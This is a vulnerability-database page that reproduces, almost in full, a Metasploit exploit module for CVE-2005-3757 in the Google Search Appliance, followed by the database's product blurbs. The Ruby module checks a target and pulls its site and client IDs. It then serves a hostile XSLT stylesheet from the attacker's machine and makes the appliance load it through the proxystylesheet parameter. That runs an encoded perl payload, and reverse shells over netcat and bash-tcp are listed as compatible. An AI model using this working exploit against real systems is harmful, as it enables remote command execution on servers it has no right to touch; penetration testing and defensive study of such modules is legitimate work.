Lucene search
K

Google Appliance ProxyStyleSheet Command Execution

🗓️ 13 Apr 2009 14:33:26Reported by hdm <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 69 Views

Google Appliance ProxyStyleSheet Command Execution. Exploits feature in Saxon XSLT parser used by Google Search Appliance, allowing arbitrary java methods to be called

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2005-3757
1 Jul 201000:00
circl
CVE
CVE-2005-3757
22 Nov 200521:00
cve
Cvelist
CVE-2005-3757
22 Nov 200521:00
cvelist
Debian CVE
CVE-2005-3757
22 Nov 200521:00
debiancve
Exploit DB
Google Appliance ProxyStyleSheet - Command Execution (Metasploit)
1 Jul 201000:00
exploitdb
Tenable Nessus
Google Search Appliance proxystylesheet Parameter Multiple Remote Vulnerabilities (XSS, Code Exec, ID)
22 Nov 200500:00
nessus
NVD
CVE-2005-3757
22 Nov 200521:03
nvd
Packet Storm
Google Appliance ProxyStyleSheet Command Execution
30 Oct 200900:00
packetstorm
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Google Appliance ProxyStyleSheet Command Execution',
      'Description'    => %q{
        This module exploits a feature in the Saxon XSLT parser used by
      the Google Search Appliance. This feature allows for arbitrary
      java methods to be called. Google released a patch and advisory to
      their client base in August of 2005 (GA-2005-08-m). The target appliance
      must be able to connect back to your machine for this exploit to work.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2005-3757'],
          ['OSVDB', '20981'],
          ['BID', '15509'],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 4000,
          'Compat'      =>
            {
              'PayloadType' => 'cmd cmd_bash',
              'RequiredCmd' => 'generic perl bash-tcp telnet netcat netcat-e',
            }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => '2005-08-16',
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'DefaultTarget' => 0))
  end

  # Handle incoming requests from the appliance
  def on_request_uri(cli, request)

    print_status("Handling new incoming HTTP request...")

    exec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' + payload.encoded.unpack("H*")[0] + '}))'
    data = @xml_data.gsub(/:x:MSF:x:/, exec_str)
    send_response(cli, data)
  end

  def autofilter
    true
  end

  def check
    res = send_request_cgi({
      'uri'      => '/search',
      'vars_get' =>
      {
        'client'          => rand_text_alpha(rand(15)+1),
        'site'            => rand_text_alpha(rand(15)+1),
        'output'          => 'xml_no_dtd',
        'q'               => rand_text_alpha(rand(15)+1),
        'proxystylesheet' => 'http://' + rand_text_alpha(rand(15)+1) + '/'
      }
    }, 10)

    if (res and res.body =~ /cannot be resolved to an ip address/)
      vprint_status("This system appears to be vulnerable")
      return Exploit::CheckCode::Appears
    end

    if (res and res.body =~ /ERROR: Unable to fetch the stylesheet/)
      vprint_status("This system appears to be patched")
    end

    return Exploit::CheckCode::Safe
  end


  def exploit

    # load the xml data
    path = File.join(Msf::Config.data_directory, "exploits", "google_proxystylesheet.xml")
    fd = File.open(path, "rb")
    @xml_data = fd.read(fd.stat.size)
    fd.close

    print_status("Obtaining the appliance site and client IDs...")
    # Send a HTTP/1.0 request to learn the site configuration
    res = send_request_raw({
      'uri'     => '/',
      'version' => '1.0'
    }, 10)

    if !(res and res['location'] and res['location'] =~ /site=/)
      print_status("Could not read the location header: #{res.code} #{res.message}")
      return
    end

    m = res['location'].match(/site=([^\&]+)\&.*client=([^\&]+)\&/im)
    if !(m and m[1] and m[2])
      print_status("Invalid location header: #{res['location']}")
      return
    end

    print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...")
    start_service

    print_status("Requesting a search using our custom XSLT...")
    res = send_request_cgi({
      'uri'      => '/search',
      'vars_get' =>
      {
        'client'          => m[2],
        'site'            => m[1],
        'output'          => 'xml_no_dtd',
        'q'               => rand_text_alpha(rand(15)+1),
        'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",
        'proxyreload'     => '1'
      }
    }, 25)

    if (res)
      print_status("The server returned: #{res.code} #{res.message}")
      print_status("Waiting on the payload to execute...")
      select(nil,nil,nil,20)
    else
      print_status("No response from the server")
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation